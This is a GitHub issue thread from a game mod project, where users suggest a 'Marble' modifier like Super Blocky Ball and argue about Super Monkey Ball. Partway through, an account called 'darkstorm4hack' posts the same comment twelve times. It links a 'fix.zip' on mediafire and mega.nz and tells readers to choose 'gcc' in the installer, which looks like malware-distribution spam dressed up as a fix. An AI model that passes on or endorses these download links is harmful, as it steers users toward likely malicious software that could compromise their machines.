### ISSUE TITLE
New modifier - Marble

### ISSUE THREAD

**Issue by TheMan6900** [EmeraldLoc/tag#1111]
This modifier would trap you inside of a marble, which could roll around (obviously), jump and would have proper rolling physics. Basically "Super Blocky Ball" but a modifier (hope you know what that game is lol).

**Comment by TheMan6900** [comment]
it would also interact with springs the same way it does in super blocky ball

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by EmeraldLoc** [comment]
monkey ball

you better have not suggested this from a Roblox knock off game of monkey ball

money ball

**Comment by TheMan6900** [comment]
its not even a super monkey ball knock off 💀, its a ball racing game, and controls wildly differently from monkey game

**Comment by TheMan6900** [comment]
https://github.com/user-attachments/assets/12c24e7e-542c-4715-86bd-94a621cab4d5

**Comment by Bear64DX** [comment]
> Recording.2024-08-25.093004.mp4

😔

**Comment by TheMan6900** [comment]
> > Recording.2024-08-25.093004.mp4
> 
> 😔

?

**Comment by Bear64DX** [comment]
> > > Recording.2024-08-25.093004.mp4
> > 
> > 
> > 😔
> 
> ?

midblox.....

**Comment by TheMan6900** [comment]
super blocky ball is PEAK

**Comment by EmeraldLoc** [comment]
This poor soul never did experience the greatness of super monkey ball

**Comment by TheMan6900** [comment]
> This poor soul never did experience the greatness of super monkey ball

honestly, super blocky ball >>>>>> super monkey ball

**Comment by EmeraldLoc** [comment]
Nonono, you're young so you probably didn't play the original monkey ball, you probably played the crappy switch version

**Comment by TheMan6900** [comment]
> Nonono, you're young so you probably didn't play the original monkey ball, you probably played the crappy switch version

how old even are you emerald 💀

**Comment by TheMan6900** [comment]
I actually played the original, I thought it sucked

**Comment by TheMan6900** [comment]
saus didnt you also think super bloxy ball was peak 💀

**Comment by TheMan6900** [comment]
unironically though super bloxy ball would be 100x better for tag than super monkey ball.

**Comment by EmeraldLoc** [comment]
I disagree, going with MONKEY BALL BABY, YEAAAAAAAA!!!!

The level moving effect is gonna be fun to make, this'll actually be really fun

**Comment by TheMan6900** [comment]
uh how are you gonna platform 💀

**Comment by TheMan6900** [comment]
wait you can just manipulate the level terrain with lua?

**Comment by EmeraldLoc** [comment]
No, however you can make it appear that way, I haven't tried it yet and its tricky, however all you need is some camera magic to make the effect work.

**Comment by TheMan6900** [comment]
how are you gonna be able to platform with this?

**Comment by EmeraldLoc** [comment]
dw bout it
